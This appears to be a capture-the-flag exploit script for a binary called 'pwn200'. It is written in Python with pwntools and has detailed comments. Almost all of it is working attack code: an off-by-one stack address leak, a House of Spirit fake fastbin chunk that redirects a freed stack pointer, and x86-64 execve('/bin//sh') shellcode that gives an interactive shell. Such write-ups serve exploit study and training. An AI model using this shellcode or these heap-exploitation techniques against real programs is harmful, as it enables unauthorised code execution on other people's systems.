Technique: fastbin use-after-free + House of Spirit (a fake chunk is laid out on the stack, freed into the fastbin, and handed back by the next same-size malloc).

Step 1 – off-by-one leak: the 48-byte name is filled exactly (47 bytes + an 'm' marker), so no terminator is written and the program's echo of the name runs into the stack value that follows the buffer; the script treats that value as RBP.

Step 2 – the "money" input is 64 bytes long; its last 8 bytes overwrite a pointer on the stack, redirecting it to a stack address of our choosing (rbp-0x90).

Step 3 – the same input lays out a fake chunk header (size 0x41) just before that address, so freeing the pointer puts the fake chunk in the 0x40 fastbin and the next 48-byte allocation returns it — a write into the stack frame, used to plant the shellcode address.

from pwn import *
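raw_file = ELF('pwn200')     # target binary; loaded for symbols, not used by the script below
libc = ELF('libc.so.6')      # libc shipped with the challenge; also unused by this exploit path
# './pwn200' rather than 'pwn200': a path containing a separator is always used
# as-is, whereas some pwntools versions resolve a bare name through $PATH.
p = process('./pwn200')
p.recvuntil(b'who are u?\n')  # banner; the 48-byte name prompt follows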
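def makeshellcode():
    """Build the 48-byte 'name' input: execve("/bin//sh") shellcode, filler, marker.

    Returns a byte string of exactly 48 bytes:
      * bytes 0-22  : x86-64 shellcode (xor esi,esi; movabs rbx,"/bin//sh";
                      push rsi; push rbx; push rsp; pop rdi; push 0x3b; pop rax;
                      xor edx,edx; syscall) -> execve("/bin//sh", NULL, NULL)
      * bytes 23-46 : 'a' filler
      * byte  47    : 'm', the marker leakrbp() scans for.  Per the note at the
                      top of the file, filling all 48 slots is what leaves the
                      following stack bytes unterminated and therefore printable.

    Byte literals are used throughout (identical to str on Python 2) so the
    bytes >= 0x80 in the shellcode are not UTF-8 expanded when this is run
    under Python 3 pwntools.  The shellcode contains no NUL byte.
    """
    shellcode = (
        b"\x31\xf6"                                   # xor    esi, esi      (argv = NULL)
        b"\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68"   # movabs rbx, "/bin//sh"
        b"\x56"                                       # push   rsi           (NUL terminator)
        b"\x53"                                       # push   rbx           (the path string)
        b"\x54\x5f"                                   # push rsp; pop rdi    (rdi = &"/bin//sh")
        b"\x6a\x3b\x58"                               # push 0x3b; pop rax   (SYS_execve)
        b"\x31\xd2"                                   # xor    edx, edx      (envp = NULL)
        b"\x0f\x05"                                   # syscall
    )
    # 47 bytes of shellcode+filler, then the marker as the 48th and last byte
    return shellcode.ljust(47, b'a') + b'm'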
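def leakrbp():
    """Read the stack value the program prints right after our 48-byte name.

    Uses the module-level tube `p`.  Skips up to and including the 'm' marker
    placed by makeshellcode(), takes everything up to the ', w' that follows in
    the program's reply, drops that 3-byte terminator and unpacks the rest as a
    little-endian 64-bit integer.  The leak is NUL-padded on the right because
    a canonical user-space address has zero high bytes, which a string-style
    print stops at (presumably; this is what the original padding relies on).

    Returns the leaked value as an int.

    Raises ValueError if more than 8 bytes arrive before ', w' — that means the
    marker did not land where expected and the value would not be an address.
    """
    p.recvuntil(b'm')
    leaked = p.recvuntil(b', w')[:-3]
    if len(leaked) > 8:
        raise ValueError("leak is %d bytes, expected at most 8: %r" % (len(leaked), leaked))
    # right-pad the short leak so u64 sees exactly 8 bytes
    return u64(leaked.ljust(8, b'\x00'))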
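shellcode = makeshellcode()
p.send(shellcode)                      # 48-byte name: shellcode + 'm' marker, no terminator
rbp_addr = leakrbp()
print("rbp_addr is %s" % hex(rbp_addr))
# NOTE(review): the leaked value is treated as a frame pointer and both offsets
# below are fixed distances from it, tuned against this binary; a different
# build (or a different leaked slot) needs them re-derived.
target_addr = rbp_addr - 0x90          # user pointer of the fake chunk we will free
shellcode_addr = rbp_addr - 0x50       # start of the name buffer, i.e. the shellcode

p.recvuntil(b'id ~~?')
p.send(b'32\n')
p.recvuntil(b'money~')
# 64-byte "money" input (House of Spirit).  Bytes 32-47 are a fake fastbin
# chunk header: prev_size = 0, size = 0x41 (0x40-byte chunk, PREV_INUSE set),
# so that the chunk's user pointer is target_addr.  Bytes 56-63 overwrite the
# stack-resident pointer the program frees on option 2, pointing it at
# target_addr.  For this to line up the money buffer itself must sit at
# target_addr - 0x30, as the original offsets imply.
# Caveat: glibc's fast-path free() also checks the size field of the chunk
# *after* the fake one (here target_addr + 0x38, "invalid next size (fast)").
# That slot is outside this 64-byte write, so the technique relies on whatever
# already sits there on the stack passing that check.
fake_chunk = p64(0) * 4 + p64(0) + p64(0x41)
payload = fake_chunk.ljust(0x38, b'\x00') + p64(target_addr)
assert len(payload) == 0x40            # exactly one 64-byte money record
p.send(payload)

p.recvuntil(b'choice : ')
p.send(b'2\n')                         # free(pointer): fake chunk enters the 0x40 fastbin
p.recvuntil(b'choice : ')
p.send(b'1\n')                         # malloc(48) -> size class 0x40 -> returns target_addr
p.recvuntil(b'long?')
p.send(b'48\n')
p.recvuntil(b'48\n')                   # consume the program's echo of the length
# 48-byte write into the chunk that now aliases the stack: the 8 bytes at
# offset 0x18 become the shellcode address.  From this script alone it is not
# visible whether that slot is a saved return address or a function pointer in
# the object option 3 uses; either way option 3 transfers control there.  This
# only yields a shell if the stack is executable (no NX) for this binary.
data = (b'a' * 0x18 + p64(shellcode_addr)).ljust(48, b'\x00')
assert len(data) == 48                 # matches the requested length, no overflow of the chunk
p.send(data)
p.recvuntil(b'choice : ')
p.send(b'3\n')                         # trigger the jump into the shellcode
p.interactive()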